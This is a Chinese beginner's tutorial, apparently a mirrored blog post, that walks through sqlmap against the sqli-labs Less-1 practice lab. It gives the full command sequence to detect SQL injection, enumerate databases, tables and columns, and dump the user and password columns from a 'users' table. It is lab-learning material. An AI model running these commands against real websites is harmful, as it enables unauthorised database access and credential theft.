zoukankan      html  css  js  c++  java
  • sqlmap基础使用(以sqli—labs第一关为例)

    一、基础测试有哪些漏洞

    命令:sqlmap.py -u "url"

    语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1"

    结果:

     二、爆出所有数据库命令

    命令:sqlmap.py -u "url" --dbs

    语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" --dbs

    结果:

     三、爆指定数据库的表名

    命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定数据库名称  --tables

    语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa --tables

     四、爆指定表中字段

    命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定数据库名称  -T 指定表的名称  --columns

    语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D  dvwa   -T  users  --columns

    结果:

     五、爆字段内容

    命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定数据库名称  -T 指定表的名称  -C  user,password  --dump

    语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa  -T users  -C  user,password  --dump

    注:这个应该password输出的是数字与字母混合的字符串,由于在输入上面语句的过程中,我在这里选择了yes,顺带着给解密了

    结果:

    还没完,今日先到这~~~

  • 相关阅读:
    HDU 4069 Squiggly Sudoku
    SPOJ 1771 Yet Another NQueen Problem
    POJ 3469 Dual Core CPU
    CF 118E Bertown roads
    URAL 1664 Pipeline Transportation
    POJ 3076 Sudoku
    UVA 10330 Power Transmission
    HDU 1426 Sudoku Killer
    POJ 3074 Sudoku
    HDU 3315 My Brute
  • 原文地址:https://www.cnblogs.com/ApricityJ/p/12804436.html
Copyright © 2011-2022 走看看